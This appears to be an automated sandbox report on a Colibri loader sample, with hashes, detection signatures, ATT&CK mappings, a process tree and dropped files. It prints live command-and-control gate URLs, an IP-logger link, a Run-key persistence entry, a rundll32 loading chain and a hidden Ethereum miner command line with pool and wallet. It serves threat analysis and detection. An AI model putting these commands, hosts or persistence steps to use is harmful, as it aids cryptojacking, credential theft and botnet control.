colibri | 5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4

Analysis

max time kernel
103s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
04-09-2022 08:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
Size

657KB
MD5

1ab9115cce93709220c60217c4077c34
SHA1

4444d87625d9001bbbe99d975542b97884cb83a0
SHA256

5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4
SHA512

cd46ae14d3a2c81ea4bd791a51b867293c10ee3771697f6204e816f055d366b4f9a2f9faa5285cf4dd3c5f49066aa6b75805dc61da3a561810a6ef87ac5a12e1
SSDEEP

6144:dg5nk5lJmbKTk6b3HVaMjAsbNWTIRlRDBnN9PFja0HdjfCvA+YJJAUPvQ:dg5nkxmGT3Nx0MJN9PFrHdLCY+YJg

Score

10^/10

colibri build1 discovery loader miner persistence spyware stealer

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri

Detectes Phoenix Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix
C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 12 IoCs

Processes:

conhost.execonhost.exemsedge.exesvchost.exeLEKAC59J5DH51D6.exetmpFF44.tmp.exetmpFF44.tmp.exeG0GMGA2AEB52L4K.exetmp11A3.tmp.exetmp11A3.tmp.exeJ479I2LLIK02G5J.exeJ479I2LLIK02G5J.exe

pid	process
3980	conhost.exe
456	conhost.exe
1536	msedge.exe
5048	svchost.exe
2252	LEKAC59J5DH51D6.exe
2352	tmpFF44.tmp.exe
3884	tmpFF44.tmp.exe
2940	G0GMGA2AEB52L4K.exe
2220	tmp11A3.tmp.exe
3632	tmp11A3.tmp.exe
3700	J479I2LLIK02G5J.exe
3552	J479I2LLIK02G5J.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LEKAC59J5DH51D6.exeG0GMGA2AEB52L4K.exeJ479I2LLIK02G5J.exeJ479I2LLIK02G5J.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	LEKAC59J5DH51D6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	G0GMGA2AEB52L4K.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	J479I2LLIK02G5J.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	J479I2LLIK02G5J.exe

Loads dropped DLL 5 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

pid process

1232 rundll32.exe
2516 rundll32.exe
4536 rundll32.exe
4536 rundll32.exe
4920 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1232	rundll32.exe
2516	rundll32.exe
4536	rundll32.exe
4536	rundll32.exe
4920	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdge = "C:\\Users\\Admin\\AppData\\Roaming\\MSEdge\\msedge.exe"	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

svchost.exe

pid process

5048 svchost.exe
5048 svchost.exe

pid	process
5048	svchost.exe
5048	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.execonhost.exe5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exetmpFF44.tmp.exetmp11A3.tmp.exe

description	pid	process	target process
PID 4452 set thread context of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 3980 set thread context of 456	3980	conhost.exe	conhost.exe
PID 556 set thread context of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 2352 set thread context of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2220 set thread context of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

LEKAC59J5DH51D6.exeG0GMGA2AEB52L4K.exe

pid	process
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2940	G0GMGA2AEB52L4K.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe
2252	LEKAC59J5DH51D6.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

LEKAC59J5DH51D6.exeG0GMGA2AEB52L4K.exe

description pid process

Token: SeDebugPrivilege 2252 LEKAC59J5DH51D6.exe
Token: SeDebugPrivilege 2940 G0GMGA2AEB52L4K.exe

description	pid	process
Token: SeDebugPrivilege	2252	LEKAC59J5DH51D6.exe
Token: SeDebugPrivilege	2940	G0GMGA2AEB52L4K.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.execonhost.exe5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.execmd.exemsedge.exeLEKAC59J5DH51D6.exetmpFF44.tmp.exeG0GMGA2AEB52L4K.exetmp11A3.tmp.exe

description	pid	process	target process
PID 4452 wrote to memory of 3980	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	conhost.exe
PID 4452 wrote to memory of 3980	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	conhost.exe
PID 4452 wrote to memory of 3980	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	conhost.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4452 wrote to memory of 556	4452	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 3980 wrote to memory of 456	3980	conhost.exe	conhost.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 556 wrote to memory of 4792	556	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
PID 4792 wrote to memory of 4312	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	cmd.exe
PID 4792 wrote to memory of 4312	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	cmd.exe
PID 4792 wrote to memory of 4312	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	cmd.exe
PID 4312 wrote to memory of 1536	4312	cmd.exe	msedge.exe
PID 4312 wrote to memory of 1536	4312	cmd.exe	msedge.exe
PID 1536 wrote to memory of 5048	1536	msedge.exe	svchost.exe
PID 1536 wrote to memory of 5048	1536	msedge.exe	svchost.exe
PID 4792 wrote to memory of 2252	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	LEKAC59J5DH51D6.exe
PID 4792 wrote to memory of 2252	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	LEKAC59J5DH51D6.exe
PID 2252 wrote to memory of 2352	2252	LEKAC59J5DH51D6.exe	tmpFF44.tmp.exe
PID 2252 wrote to memory of 2352	2252	LEKAC59J5DH51D6.exe	tmpFF44.tmp.exe
PID 2252 wrote to memory of 2352	2252	LEKAC59J5DH51D6.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 2352 wrote to memory of 3884	2352	tmpFF44.tmp.exe	tmpFF44.tmp.exe
PID 4792 wrote to memory of 2940	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	G0GMGA2AEB52L4K.exe
PID 4792 wrote to memory of 2940	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	G0GMGA2AEB52L4K.exe
PID 2940 wrote to memory of 2220	2940	G0GMGA2AEB52L4K.exe	tmp11A3.tmp.exe
PID 2940 wrote to memory of 2220	2940	G0GMGA2AEB52L4K.exe	tmp11A3.tmp.exe
PID 2940 wrote to memory of 2220	2940	G0GMGA2AEB52L4K.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 2220 wrote to memory of 3632	2220	tmp11A3.tmp.exe	tmp11A3.tmp.exe
PID 4792 wrote to memory of 3700	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	J479I2LLIK02G5J.exe
PID 4792 wrote to memory of 3700	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	J479I2LLIK02G5J.exe
PID 4792 wrote to memory of 3700	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	J479I2LLIK02G5J.exe
PID 4792 wrote to memory of 3552	4792	5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe	J479I2LLIK02G5J.exe

C:\Users\Admin\AppData\Local\Temp\5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
"C:\Users\Admin\AppData\Local\Temp\5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4452

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3980

C:\ProgramData\conhost.exe
"C:\ProgramData\conhost.exe"
3⤵
- Executes dropped EXE
PID:456

C:\Users\Admin\AppData\Local\Temp\5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
"C:\Users\Admin\AppData\Local\Temp\5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:556

C:\Users\Admin\AppData\Local\Temp\5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe
"C:\Users\Admin\AppData\Local\Temp\5f786ef7b4a40accb4b2903acf2bdf1b249c2c4514303bb7ca3c5ac6010ac9d4.exe"
3⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4312

C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe
-pool us-eth.2miners.com:2020 -wal 0x298a98736156cdffdfaf4580afc4966904f1e12e -worker ferma -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin eth
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5048

C:\Users\Admin\AppData\Local\Temp\LEKAC59J5DH51D6.exe
"C:\Users\Admin\AppData\Local\Temp\LEKAC59J5DH51D6.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252

C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2352

C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpFF44.tmp.exe"
6⤵
- Executes dropped EXE
PID:3884

C:\Users\Admin\AppData\Local\Temp\G0GMGA2AEB52L4K.exe
"C:\Users\Admin\AppData\Local\Temp\G0GMGA2AEB52L4K.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940

C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2220

C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp11A3.tmp.exe"
6⤵
- Executes dropped EXE
PID:3632

C:\Users\Admin\AppData\Local\Temp\J479I2LLIK02G5J.exe
"C:\Users\Admin\AppData\Local\Temp\J479I2LLIK02G5J.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3700

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\S7DcYBD2.Ze
5⤵
PID:3408

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\S7DcYBD2.Ze
6⤵
- Loads dropped DLL
PID:1232

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\S7DcYBD2.Ze
7⤵
PID:3468

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\S7DcYBD2.Ze
8⤵
- Loads dropped DLL
PID:4536

C:\Users\Admin\AppData\Local\Temp\J479I2LLIK02G5J.exe
https://iplogger.org/1QsEf7
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3552

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\S7DcYBD2.Ze
5⤵
PID:3160

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\S7DcYBD2.Ze
6⤵
- Loads dropped DLL
PID:2516

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\S7DcYBD2.Ze
7⤵
PID:4628

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\S7DcYBD2.Ze
8⤵
- Loads dropped DLL
PID:4920

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\G0GMGA2AEB52L4K.exe
Filesize
464KB

MD5
f505fdccc61cf2d723e5169283841588

SHA1
8b788f05bc58cedc99d9f3f1b296ce33501511f7

SHA256
7544f78d92ca394c25ce481e4f5dae84e175caed045471d8f1133077e76b0340

SHA512
85d528e973c027682a76deab39f4f667ac0267823fecbbd173db1fbe30029df6a6d675e141d709438e9658b9a81e9600ec3c67488d8c6874ff3f2f0f7d452f98

Download Submit
C:\Users\Admin\AppData\Local\Temp\G0GMGA2AEB52L4K.exe
Filesize
464KB

MD5
f505fdccc61cf2d723e5169283841588

SHA1
8b788f05bc58cedc99d9f3f1b296ce33501511f7

SHA256
7544f78d92ca394c25ce481e4f5dae84e175caed045471d8f1133077e76b0340

SHA512
85d528e973c027682a76deab39f4f667ac0267823fecbbd173db1fbe30029df6a6d675e141d709438e9658b9a81e9600ec3c67488d8c6874ff3f2f0f7d452f98

Download Submit
C:\Users\Admin\AppData\Local\Temp\J479I2LLIK02G5J.exe
Filesize
1.5MB

MD5
0b429b506411a8cd58fe962441b9fc71

SHA1
febd47c9379e0c3f0bf35e315ef66b3d8f0bf0be

SHA256
4f138e66438db3f1e782e20b2f22f0efb006750e21adaa7c532cdb7b44ccdaf0

SHA512
96feca33753f9b0f023ce0d3835ca0cc51353b12a185803a42383656562a1b3edba33bfa0bf03ef7437489ddadb2cee8210d5d9dee12117c471600b554242fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\J479I2LLIK02G5J.exe
Filesize
1.5MB

MD5
0b429b506411a8cd58fe962441b9fc71

SHA1
febd47c9379e0c3f0bf35e315ef66b3d8f0bf0be

SHA256
4f138e66438db3f1e782e20b2f22f0efb006750e21adaa7c532cdb7b44ccdaf0

SHA512
96feca33753f9b0f023ce0d3835ca0cc51353b12a185803a42383656562a1b3edba33bfa0bf03ef7437489ddadb2cee8210d5d9dee12117c471600b554242fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\J479I2LLIK02G5J.exe
Filesize
1.5MB

MD5
0b429b506411a8cd58fe962441b9fc71

SHA1
febd47c9379e0c3f0bf35e315ef66b3d8f0bf0be

SHA256
4f138e66438db3f1e782e20b2f22f0efb006750e21adaa7c532cdb7b44ccdaf0

SHA512
96feca33753f9b0f023ce0d3835ca0cc51353b12a185803a42383656562a1b3edba33bfa0bf03ef7437489ddadb2cee8210d5d9dee12117c471600b554242fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\LEKAC59J5DH51D6.exe
Filesize
464KB

MD5
67b8e6e6b35a05a52fed62e201f146df

SHA1
3839d4e4dff0be17ff39e8138391f48f2ecc7f6c

SHA256
8deb5eeccb0143ed1756e783d1a2401f39a7d8fe9c9c282af31421243432ef9b

SHA512
3e6ea796b79a8c7e9b5843f09e5281d32dfb6b025ac9e4c9a89b7046a282f73065b6708ba51108b910805dbc65e13c10e15b4e62530ba356d1f9e23fe0804284

Download Submit
